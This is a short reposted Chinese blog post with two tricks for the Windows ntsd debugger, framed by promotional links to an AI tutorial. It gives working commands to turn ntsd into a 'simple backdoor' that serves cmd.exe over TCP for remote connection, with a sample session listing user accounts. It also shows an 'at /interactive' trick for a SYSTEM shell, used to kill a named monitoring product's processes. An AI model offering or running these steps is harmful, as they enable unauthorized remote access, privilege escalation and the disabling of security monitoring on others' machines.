分享一下我老師大神的人工智能教程！零基礎，通俗易懂！http://blog.csdn.net/jiangjunshow

也歡迎大家轉載本篇文章。分享知識，造福人民，實現我們中華民族偉大復興！

ntsd是win2000開始自帶的命令行調試工具

一.簡易后門

ntsd -server tcp:port=22 cmd.exe

在另一臺機上:

ntsd -remote tcp:server=192.168.1.33,port=22

.shell

結果：

0:000> .shell
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.

C:/><.shell waiting 1 second(s) for process>
<.shell process may need input>net user
net user
<.shell waiting 1 second(s) for process>

//X-4F5625DB5B074 的用戶帳戶

——————————————————————————-
aaa????????????????????? Administrator??????????? Guest
HelpAssistant??????????? IUSR_X-4F5625DB5B074???? IWAM_X-4F5625DB5B074
SUPPORT_388945a0???????? xhacker
命令成功完成。

C:/><.shell waiting 1 second(s) for process>
<.shell process may need input>

?

二.殺進程

先用tasklist找到要殺的PID，然后ntsd -c q -p PID

有些程序需要system權限才能kill，假設現在系統時間是4:55PM
“開始 “->? “運行 “->? “at ? 16:56 ? /interactive ? %systemroot%/system32/cmd.exe “-> 回車
這樣在4:56PM就會得到一個system權限的shell
在這個shell里面使用ntsd命令把“北信源監控”的所有進程殺掉。

???????????

給我老師的人工智能教程打call！http://blog.csdn.net/jiangjunshow

總結

以上是生活随笔為你收集整理的ntsd的两个技巧的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。